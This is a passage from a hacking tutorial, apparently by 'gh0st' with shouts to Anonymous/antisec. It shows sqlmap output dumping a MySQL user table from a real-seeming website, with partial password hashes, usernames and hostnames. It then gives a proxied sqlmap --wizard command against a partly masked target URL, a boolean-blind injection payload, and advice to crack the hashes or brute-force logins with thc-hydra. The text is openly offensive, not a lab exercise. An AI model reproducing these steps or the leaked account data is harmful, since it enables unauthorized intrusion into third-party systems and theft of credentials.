*CF9EBDBEB7E917593C84F8FA6CA1D13E289F5F | N | N | N | N | N | N | N | N | N | NULL | NULL | N | N | panel | NULL | NULL | | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | localhost | Y | Y | N | 0 | 0 | 0 | 0 | *E784A49C8C7340D14CBFEC6181911832FB | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | graber | NULL | NULL | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | localhost | Y | Y | Y | 0 | 0 | 0 | 0 | *605A60BF6EFC17C157CF1E34F576F35B | Y | Y | Y | Y | Y | Y | Y | Y | Y | NULL | NULL | Y | Y | NULL | NULL | NULL | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | ic-earth-ny.indexcopernicus.com | Y | Y | Y | 0 | 0 | 0 | 0 | *6A511966616CD43C35166A81BC2AC01F7 | Y | Y | Y | Y | Y | Y | Y | Y | Y | NULL | NULL | Y | Y | root | NULL | NULL | | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | ic-earth-ny.indexcopernicus.com | Y | Y | N | 0 | 0 | 0 | 0 | *E56A114692FE0DE073F9A1DD68A00EEB9703F3 | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | NULL | NULL | NULL | | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | 10.11.12.1 | Y | Y | N | 0 | 0 | 0 | 0 | *5917878B1F04F5E4B9815B2056B340F87CD477 | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | root | NULL | NULL | | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | 10.11.12.1 | Y | Y | N | 0 | 0 | 0 | 0 | *B012E8731FF1DF44F3D8B26837708985278C3C | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | projects | NULL | NULL | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | 10.11.12.1 | Y | Y | Y | 0 | 0 | 0 | 0 | *7742916D8C9524F7826938F0A5F1FB499 | Y | Y | Y | Y | Y | Y | Y | Y | Y | NULL | NULL | Y | Y | panel | NULL | NULL | | N | N | N | N | N | N | N | N | N | N | N | N | 10.11.12.1 | N | N | N | 0 | 0 | 0 | 0 | *16F2DA51526C51873E29386679D394E20ADA48 | N | N | N | N | N | N | N | N | N | NULL | NULL | N | N | lowersuser | NULL | NULL | | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | 10.11.12.1 | Y | Y | N | 0 | 0 | 0 | 0 | *854BA136D598D180847EC4689EB51C618239A | N | N | N | N | N | Y | Y | Y | N | NULL | NULL | N | Y | graber | NULL | NULL | +------------+--------------------+-------------+---------------------+-----------------------+------------------+------------------+-------------+-----------+--------------+-----------+------------+---------------------------------+------------+-------------+------------------+-----------------+---------------+-------------+----------------------+-----------------------------------------------------+--------------+-----------------+-------------+------------------+-----------------+-------------+--------------+----------------+---------------+------------+----------+------------+-------------+----------------+-------------+--------------+ [19:10:20] [INFO] Table 'mysql.user' dumped to CSV file '/pentest/database/sqlmap/output/www.indexHIDEN.com/dump/mysql/user.csv' [19:10:20] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com' [*] shutting down at: 19:10:20 YES!!!! Okay as you can see sqlmap was able to determine the user login names and find the encrypted has passwords. It will ask us if we want to try and do a brute force password crack attempt and ofcourse we will choose yes!!! NOTE: i have removed a lot of the users and have deleted a good chunk of the encryped password and i will not be posting passwords on this tutorial, sorry! Can you now see why this is such a great tool! For those of you who have been doing your sqlinjection attacks manually, i hope you can now see the value in such a great tool! We now have login names and passwords that we can use against our target! And if you get unlucky and you are not able to get the full encrypted password you are still lucky in knowing what login names are used for the target network, and you could use an app like thc-hydra to try and get the passwords for the login names. Just a suggestions... Okay very quickly i will go over one last option with sqlmap for now because i am getting tired... the option: --wizard the option --wizard will give you a gui interface to use sqlmap.. Here is a quick example.. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --wizard sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 19:51:46 POST data (--data) [Enter for None]: --data Injection difficulty (--level/--risk). Please choose: [1] Normal (default) [2] Medium [3] Hard > 1 Enumeration (--banner/--current-user/etc). Please choose: [1] Basic (default) [2] Smart [3] All > 3 sqlmap is running, please wait.. sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 8517=8517 Okay well i hope you have found this tutorial helpful..and i will be adding more later i promise. I will get into more details. Also i plan to have a tutorial out on sqlninja! Be on the look out for that. Well i hope it helps! Take care my brothers... BIG SHOUTS TO ANONYMOUS... irc.anonymous.li #antisec Tutorial by gh0st